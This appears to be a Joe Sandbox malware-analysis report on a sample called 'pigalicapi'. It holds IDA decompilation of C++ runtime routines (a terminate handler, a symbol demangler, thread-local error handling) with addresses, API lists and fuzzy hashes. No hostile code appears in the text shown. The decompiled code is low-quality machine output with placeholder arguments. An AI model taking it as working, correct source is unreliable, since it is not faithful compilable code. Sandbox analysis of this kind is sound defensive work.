                                                                                                                                                                                                                                                                                                        C-Code - Quality: 43%
                                                                                                                                                                                                                                                                                                        			E00417690(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a20, intOrPtr _a32, char* _a36, intOrPtr _a40) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                                                                                                                        				char* _t33;
                                                                                                                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t51;
                                                                                                                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                                                                        				char** _t55;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t49 = _a40;
                                                                                                                                                                                                                                                                                                        				_a20 = _a36;
                                                                                                                                                                                                                                                                                                        				_t26 = _a32;
                                                                                                                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                                                                                                                        					L6:
                                                                                                                                                                                                                                                                                                        					_t49 = _t49 - 1;
                                                                                                                                                                                                                                                                                                        					 *_t55 = _a20;
                                                                                                                                                                                                                                                                                                        					if(_t49 != 0) {
                                                                                                                                                                                                                                                                                                        						E00418140(_t47, _t52, _t53, _t54);
                                                                                                                                                                                                                                                                                                        						_a32 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        						E004183F0(_t47, _t52, _t53, _t54);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t33 =  *((intOrPtr*)( *((intOrPtr*)(E00418140(_t47, _t52, _t53, _t54))) + 8))();
                                                                                                                                                                                                                                                                                                        						_t51 = __imp___iob;
                                                                                                                                                                                                                                                                                                        						_a8 = 0xb;
                                                                                                                                                                                                                                                                                                        						_a4 = 1;
                                                                                                                                                                                                                                                                                                        						 *_t55 = "  what():  ";
                                                                                                                                                                                                                                                                                                        						_a32 = 2;
                                                                                                                                                                                                                                                                                                        						_a20 = _t33;
                                                                                                                                                                                                                                                                                                        						_t18 = _t51 + 0x40; // 0x76664640
                                                                                                                                                                                                                                                                                                        						_a12 = _t18;
                                                                                                                                                                                                                                                                                                        						fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        						_t49 = __imp___iob;
                                                                                                                                                                                                                                                                                                        						_t20 = _t49 + 0x40; // 0x76664640
                                                                                                                                                                                                                                                                                                        						_a4 = _t20;
                                                                                                                                                                                                                                                                                                        						 *_t55 = _a20;
                                                                                                                                                                                                                                                                                                        						fputs(??, ??);
                                                                                                                                                                                                                                                                                                        						 *_t55 = 0xa;
                                                                                                                                                                                                                                                                                                        						_a4 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        						fputc(??, ??);
                                                                                                                                                                                                                                                                                                        						E004183F0(_t47, _t52, _t53, _t54);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					_a32 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					abort();
                                                                                                                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                                                                                                                        					E004183F0(_t47, _t52, _t53, _t54);
                                                                                                                                                                                                                                                                                                        					_a32 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        					 *_t55 = _a20;
                                                                                                                                                                                                                                                                                                        					E0040E810();
                                                                                                                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(_t26 == 1) {
                                                                                                                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				asm("ud2");
                                                                                                                                                                                                                                                                                                        				_a8 = 0x2d;
                                                                                                                                                                                                                                                                                                        				_a4 = 1;
                                                                                                                                                                                                                                                                                                        				 *_t55 = "terminate called without an active exception\n";
                                                                                                                                                                                                                                                                                                        				_a12 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        				_a32 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        				fwrite(??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                                                                                                                        			}












                                                                                                                                                                                                                                                                                                        0x00417694
                                                                                                                                                                                                                                                                                                        0x00417698
                                                                                                                                                                                                                                                                                                        0x0041769c
                                                                                                                                                                                                                                                                                                        0x004176a2
                                                                                                                                                                                                                                                                                                        0x00417701
                                                                                                                                                                                                                                                                                                        0x00417705
                                                                                                                                                                                                                                                                                                        0x00417708
                                                                                                                                                                                                                                                                                                        0x0041770b
                                                                                                                                                                                                                                                                                                        0x00417790
                                                                                                                                                                                                                                                                                                        0x00417795
                                                                                                                                                                                                                                                                                                        0x0041779d
                                                                                                                                                                                                                                                                                                        0x0041770d
                                                                                                                                                                                                                                                                                                        0x00417716
                                                                                                                                                                                                                                                                                                        0x00417719
                                                                                                                                                                                                                                                                                                        0x0041771f
                                                                                                                                                                                                                                                                                                        0x00417727
                                                                                                                                                                                                                                                                                                        0x0041772f
                                                                                                                                                                                                                                                                                                        0x00417736
                                                                                                                                                                                                                                                                                                        0x0041773e
                                                                                                                                                                                                                                                                                                        0x00417742
                                                                                                                                                                                                                                                                                                        0x00417745
                                                                                                                                                                                                                                                                                                        0x00417749
                                                                                                                                                                                                                                                                                                        0x0041774e
                                                                                                                                                                                                                                                                                                        0x00417754
                                                                                                                                                                                                                                                                                                        0x00417757
                                                                                                                                                                                                                                                                                                        0x0041775f
                                                                                                                                                                                                                                                                                                        0x00417762
                                                                                                                                                                                                                                                                                                        0x0041776c
                                                                                                                                                                                                                                                                                                        0x00417776
                                                                                                                                                                                                                                                                                                        0x0041777a
                                                                                                                                                                                                                                                                                                        0x0041777f
                                                                                                                                                                                                                                                                                                        0x0041777f
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x004176db
                                                                                                                                                                                                                                                                                                        0x004176e3
                                                                                                                                                                                                                                                                                                        0x004176e8
                                                                                                                                                                                                                                                                                                        0x004176e8
                                                                                                                                                                                                                                                                                                        0x004176f1
                                                                                                                                                                                                                                                                                                        0x004176f9
                                                                                                                                                                                                                                                                                                        0x004176fc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004176fc
                                                                                                                                                                                                                                                                                                        0x004176a7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004176a9
                                                                                                                                                                                                                                                                                                        0x004176b0
                                                                                                                                                                                                                                                                                                        0x004176b8
                                                                                                                                                                                                                                                                                                        0x004176c0
                                                                                                                                                                                                                                                                                                        0x004176ca
                                                                                                                                                                                                                                                                                                        0x004176ce
                                                                                                                                                                                                                                                                                                        0x004176d6
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: fwrite$abortfputcfputs
                                                                                                                                                                                                                                                                                                        • String ID: -
                                                                                                                                                                                                                                                                                                        • API String ID: 631181824-2547889144
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1d442c1804fa77e5723a9122c583503d7bc927b73efbeefd61df61e2df286f69
                                                                                                                                                                                                                                                                                                        • Instruction ID: e34ec58ff9fcec24660ec2e7040b0e2af75343082bb94453d7ff8c69b4f5a42c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d442c1804fa77e5723a9122c583503d7bc927b73efbeefd61df61e2df286f69
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D21C9B55083428FD304EF6AC54564EBBE0FB88718F048E2EE4D497391D779D8858B9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E0040C7DC(signed char* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                                                                        				signed char* _t93;
                                                                                                                                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                                                                                                                        				int _t111;
                                                                                                                                                                                                                                                                                                        				signed char* _t116;
                                                                                                                                                                                                                                                                                                        				signed char* _t120;
                                                                                                                                                                                                                                                                                                        				signed char* _t121;
                                                                                                                                                                                                                                                                                                        				signed int _t124;
                                                                                                                                                                                                                                                                                                        				signed int _t125;
                                                                                                                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                                                                                                                                                        				signed char* _t143;
                                                                                                                                                                                                                                                                                                        				void* _t144;
                                                                                                                                                                                                                                                                                                        				signed char* _t146;
                                                                                                                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t149;
                                                                                                                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                                                                                                                        				signed char** _t151;
                                                                                                                                                                                                                                                                                                        				void* _t154;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				 *_t149 = __ebx;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x184) = __edx;
                                                                                                                                                                                                                                                                                                        				_t76 = strlen(??);
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t147 - 0x170)) = __ebx;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x168) = 0x11;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x164) = __ebx;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x15c) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x150) = 0;
                                                                                                                                                                                                                                                                                                        				_t124 = _t76;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t147 - 0x16c)) = __ebx + _t76;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t147 - 0x158)) = _t124 + _t124;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x14c) = _t124;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x148) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x144) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x140) = 0;
                                                                                                                                                                                                                                                                                                        				_t150 = _t149 - E0040DB20(0x00000012 + (_t124 + _t124 + _t124 * 0x00000004) * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        				_t85 = E0040DB20(0x00000012 + _t124 * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        				_t129 =  *(_t147 - 0x184);
                                                                                                                                                                                                                                                                                                        				_t151 = _t150 - _t85;
                                                                                                                                                                                                                                                                                                        				_t154 = _t144 - 1;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t147 - 0x160)) = _t150 + 0xc;
                                                                                                                                                                                                                                                                                                        				 *(_t147 - 0x154) =  &(_t151[3]);
                                                                                                                                                                                                                                                                                                        				if(_t154 == 0) {
                                                                                                                                                                                                                                                                                                        					_t125 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t129 == 0x5f) {
                                                                                                                                                                                                                                                                                                        						_t129 =  *(__ebx + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						 *(_t147 - 0x164) = __ebx + 1;
                                                                                                                                                                                                                                                                                                        						if(_t129 == 0x5a) {
                                                                                                                                                                                                                                                                                                        							 *(_t147 - 0x164) = __ebx + 2;
                                                                                                                                                                                                                                                                                                        							_t118 = _t147 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t125 = E00406810(_t147 - 0x170, 1);
                                                                                                                                                                                                                                                                                                        							if(( *(_t147 - 0x168) & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                                                                                                                        									_t146 =  *(_t147 - 0x164);
                                                                                                                                                                                                                                                                                                        									_t129 =  *_t146 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									if(_t129 != 0x2e) {
                                                                                                                                                                                                                                                                                                        										goto L9;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_t98 = _t146[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									_t73 = _t98 - 0x61; // -7
                                                                                                                                                                                                                                                                                                        									if(_t73 <= 0x19 || _t98 == 0x5f || _t98 - 0x30 <= 9) {
                                                                                                                                                                                                                                                                                                        										_t125 = E00405190(_t118, _t125);
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t129 =  *_t146 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										goto L9;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						L25:
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if(_t154 < 0 || _t144 > 3) {
                                                                                                                                                                                                                                                                                                        						_t125 = E00405ED0(_t147 - 0x170);
                                                                                                                                                                                                                                                                                                        						_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t143 = __ebx + 0xb;
                                                                                                                                                                                                                                                                                                        						 *(_t147 - 0x164) = _t143;
                                                                                                                                                                                                                                                                                                        						if( *(__ebx + 0xb) != 0x5f ||  *((char*)(__ebx + 0xc)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        							 *_t151 = _t143;
                                                                                                                                                                                                                                                                                                        							_t119 = _t147 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t127 = E00404FF0(_t147 - 0x170, strlen(??), _t143);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *(_t147 - 0x164) = __ebx + 0xd;
                                                                                                                                                                                                                                                                                                        							_t119 = _t147 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t127 = E00406810(_t147 - 0x170, 0);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t151 = 0;
                                                                                                                                                                                                                                                                                                        						_t110 = E00404F90(_t119, _t127, (0 | _t144 != 0x00000002) + 0x42);
                                                                                                                                                                                                                                                                                                        						_t120 =  *(_t147 - 0x164);
                                                                                                                                                                                                                                                                                                        						 *_t151 = _t120;
                                                                                                                                                                                                                                                                                                        						 *(_t147 - 0x184) = _t110;
                                                                                                                                                                                                                                                                                                        						_t111 = strlen(??);
                                                                                                                                                                                                                                                                                                        						_t125 =  *(_t147 - 0x184);
                                                                                                                                                                                                                                                                                                        						_t121 =  &(_t120[_t111]);
                                                                                                                                                                                                                                                                                                        						 *(_t147 - 0x164) = _t121;
                                                                                                                                                                                                                                                                                                        						_t129 =  *_t121 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L9:
                                                                                                                                                                                                                                                                                                        				_t88 = 0;
                                                                                                                                                                                                                                                                                                        				if(_t129 == 0 && _t125 != 0) {
                                                                                                                                                                                                                                                                                                        					_t116 = _t147 - 0x13c;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x3c) = 0;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t147 - 0x38)) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x2c) = 0;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t147 - 0x34)) =  *((intOrPtr*)(_t147 - 0x17c));
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x28) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x20) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x30) =  *(_t147 - 0x180);
                                                                                                                                                                                                                                                                                                        					 *(_t147 - 0x24) = 0;
                                                                                                                                                                                                                                                                                                        					E004079F0(_t116, _t125, 0x11);
                                                                                                                                                                                                                                                                                                        					_t93 =  *(_t147 - 0x3c);
                                                                                                                                                                                                                                                                                                        					 *_t151 = _t116;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t147 + _t93 - 0x13c)) = 0;
                                                                                                                                                                                                                                                                                                        					_t151[2] =  *(_t147 - 0x30);
                                                                                                                                                                                                                                                                                                        					_t151[1] = _t93;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t147 - 0x34))();
                                                                                                                                                                                                                                                                                                        					_t88 = 0 |  *(_t147 - 0x24) == 0x00000000;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t88;
                                                                                                                                                                                                                                                                                                        				goto L25;
                                                                                                                                                                                                                                                                                                        			}

























                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c3
                                                                                                                                                                                                                                                                                                        0x0040c5c9
                                                                                                                                                                                                                                                                                                        0x0040c5ce
                                                                                                                                                                                                                                                                                                        0x0040c5d4
                                                                                                                                                                                                                                                                                                        0x0040c5de
                                                                                                                                                                                                                                                                                                        0x0040c5e4
                                                                                                                                                                                                                                                                                                        0x0040c5ee
                                                                                                                                                                                                                                                                                                        0x0040c5f8
                                                                                                                                                                                                                                                                                                        0x0040c5fd
                                                                                                                                                                                                                                                                                                        0x0040c606
                                                                                                                                                                                                                                                                                                        0x0040c619
                                                                                                                                                                                                                                                                                                        0x0040c61f
                                                                                                                                                                                                                                                                                                        0x0040c629
                                                                                                                                                                                                                                                                                                        0x0040c633
                                                                                                                                                                                                                                                                                                        0x0040c642
                                                                                                                                                                                                                                                                                                        0x0040c652
                                                                                                                                                                                                                                                                                                        0x0040c657
                                                                                                                                                                                                                                                                                                        0x0040c65d
                                                                                                                                                                                                                                                                                                        0x0040c65f
                                                                                                                                                                                                                                                                                                        0x0040c666
                                                                                                                                                                                                                                                                                                        0x0040c66c
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                                                                                                                        0x0040c7f0
                                                                                                                                                                                                                                                                                                        0x0040c7f7
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x0040c80e
                                                                                                                                                                                                                                                                                                        0x0040c814
                                                                                                                                                                                                                                                                                                        0x0040c828
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c851
                                                                                                                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                                                                                                                        0x0040c861
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c82c
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c7cb
                                                                                                                                                                                                                                                                                                        0x0040c7d3
                                                                                                                                                                                                                                                                                                        0x0040c687
                                                                                                                                                                                                                                                                                                        0x0040c68b
                                                                                                                                                                                                                                                                                                        0x0040c68e
                                                                                                                                                                                                                                                                                                        0x0040c694
                                                                                                                                                                                                                                                                                                        0x0040c6a0
                                                                                                                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                                                                                                                        0x0040c885
                                                                                                                                                                                                                                                                                                        0x0040c88b
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                                                                                                                        0x0040c6cf
                                                                                                                                                                                                                                                                                                        0x0040c6d4
                                                                                                                                                                                                                                                                                                        0x0040c6da
                                                                                                                                                                                                                                                                                                        0x0040c6dd
                                                                                                                                                                                                                                                                                                        0x0040c6e3
                                                                                                                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                                                                                                                        0x0040c6f0
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c734
                                                                                                                                                                                                                                                                                                        0x0040c740
                                                                                                                                                                                                                                                                                                        0x0040c74b
                                                                                                                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                                                                                                                        0x0040c756
                                                                                                                                                                                                                                                                                                        0x0040c75d
                                                                                                                                                                                                                                                                                                        0x0040c766
                                                                                                                                                                                                                                                                                                        0x0040c76d
                                                                                                                                                                                                                                                                                                        0x0040c774
                                                                                                                                                                                                                                                                                                        0x0040c77b
                                                                                                                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                                                                                                                        0x0040c78c
                                                                                                                                                                                                                                                                                                        0x0040c792
                                                                                                                                                                                                                                                                                                        0x0040c795
                                                                                                                                                                                                                                                                                                        0x0040c79d
                                                                                                                                                                                                                                                                                                        0x0040c7a1
                                                                                                                                                                                                                                                                                                        0x0040c7a5
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                                                                                                                                                        • String ID: Z$Z__$_
                                                                                                                                                                                                                                                                                                        • API String ID: 39653677-182788727
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4fb8ad72083b6428962a0447b954abb00701ca0cc1ec574071b07b21749bc3f4
                                                                                                                                                                                                                                                                                                        • Instruction ID: dc1124b8df5cbeb599ce563203a7e1262d4f469b331ea61f697e63e652aea6c4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4fb8ad72083b6428962a0447b954abb00701ca0cc1ec574071b07b21749bc3f4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0151F871D052198BDB20DF69C8943DEBBF0AF85304F0481AED848BB391DB795A888F85
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00411C99
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004102F0: TlsGetValue.KERNEL32 ref: 0041033E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414700: Sleep.KERNEL32(?,?,?,?,?,?,0040F1DD,?,?,?,004111F8), ref: 00414740
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414700: Sleep.KERNEL32(?,?,?,?,?,?,0040F1DD,?,?,?,004111F8), ref: 00414779
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0040E202), ref: 00411CDD
                                                                                                                                                                                                                                                                                                        • realloc.MSVCRT ref: 00411D07
                                                                                                                                                                                                                                                                                                        • realloc.MSVCRT ref: 00411D1D
                                                                                                                                                                                                                                                                                                        • memset.NTDLL ref: 00411D4B
                                                                                                                                                                                                                                                                                                        • memset.NTDLL ref: 00411D69
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00414660: Sleep.KERNEL32 ref: 00414698
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
